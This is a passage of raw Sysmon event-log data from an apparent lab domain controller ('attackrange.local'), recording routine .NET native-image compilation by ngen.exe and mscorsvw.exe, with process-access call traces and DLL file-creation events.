0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008680Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:26:35.028{08A6967A-468A-6000-8604-000000009A01}3772C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\ebc-0\System.Net.dll2021-01-14 13:26:35.012 10341000x80000000000000008718Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:36.919{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-468C-6000-9104-000000009A01}4936C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008717Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:36.903{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-468C-6000-9104-000000009A01}4936C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008716Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:36.903{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-468C-6000-9104-000000009A01}4936C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008715Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:26:36.841{08A6967A-468C-6000-9004-000000009A01}4352C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1100-0\System.Runtime.Caching.dll2021-01-14 13:26:36.841 10341000x80000000000000008714Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:36.716{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-468C-6000-9004-000000009A01}4352C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008713Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:36.700{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-468C-6000-9004-000000009A01}4352C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008712Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:36.700{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-468C-6000-9004-000000009A01}4352C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008711Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:36.544{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-468C-6000-8F04-000000009A01}4120C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008710Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:36.528{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-468C-6000-8F04-000000009A01}4120C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008709Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:36.528{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-468C-6000-8F04-000000009A01}4120C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008708Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:26:36.466{08A6967A-468C-6000-8E04-000000009A01}4752C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1290-0\System.Reflection.Context.dll2021-01-14 13:26:36.466 10341000x80000000000000008707Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:36.356{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-468C-6000-8E04-000000009A01}4752C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008706Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:36.341{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-468C-6000-8E04-000000009A01}4752C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008705Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:36.341{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-468C-6000-8E04-000000009A01}4752C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008704Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:36.309{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-468C-6000-8D04-000000009A01}4916C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008703Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:36.294{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-468C-6000-8D04-000000009A01}4916C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008702Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:36.294{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-468C-6000-8D04-000000009A01}4916C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008701Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:26:36.216{08A6967A-468B-6000-8C04-000000009A01}4952C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1358-0\System.Printing.dll2021-01-14 13:26:36.216 10341000x80000000000000008735Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:37.669{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-468D-6000-9604-000000009A01}2944C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008734Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:37.653{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-468D-6000-9604-000000009A01}2944C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008733Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:37.653{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-468D-6000-9604-000000009A01}2944C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008732Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:37.606{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-468D-6000-9504-000000009A01}1316C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008731Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:37.591{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-468D-6000-9504-000000009A01}1316C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008730Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:37.591{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-468D-6000-9504-000000009A01}1316C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008729Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:26:37.528{08A6967A-468D-6000-9404-000000009A01}4156C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\103c-0\System.Runtime.Serialization.Formatters.Soap.dll2021-01-14 13:26:37.528 10341000x80000000000000008728Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 